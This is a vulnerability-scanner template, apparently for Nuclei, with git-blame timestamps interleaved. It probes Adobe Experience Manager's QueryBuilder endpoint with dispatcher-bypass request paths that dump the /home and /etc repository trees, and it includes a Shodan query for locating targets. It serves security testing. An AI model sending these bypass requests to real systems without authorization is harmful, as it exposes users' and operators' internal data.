2021-04-05 17:42:25 +00:00
|
|
|
id: aem-querybuilder-internal-path-read
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: AEM QueryBuilder Internal Path Read
|
2022-04-22 10:38:41 +00:00
|
|
|
author: DhiyaneshDk
|
2021-04-05 17:42:25 +00:00
|
|
|
severity: medium
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
|
2022-07-25 17:37:20 +00:00
|
|
|
metadata:
|
|
|
|
shodan-query: http.component:"Adobe Experience Manager"
|
2021-04-05 17:42:25 +00:00
|
|
|
tags: aem
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
|
|
|
|
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
|
|
|
|
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
|
|
|
|
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
|
2021-04-05 18:25:18 +00:00
|
|
|
|
2021-09-02 11:59:10 +00:00
|
|
|
stop-at-first-match: true
|
2021-04-05 17:42:25 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2021-04-05 18:25:18 +00:00
|
|
|
|
2021-04-05 17:42:25 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2021-04-05 18:25:18 +00:00
|
|
|
- 'jcr:path'
|
2021-04-13 19:54:00 +00:00
|
|
|
- 'success'
|
2021-04-05 18:25:18 +00:00
|
|
|
condition: and
|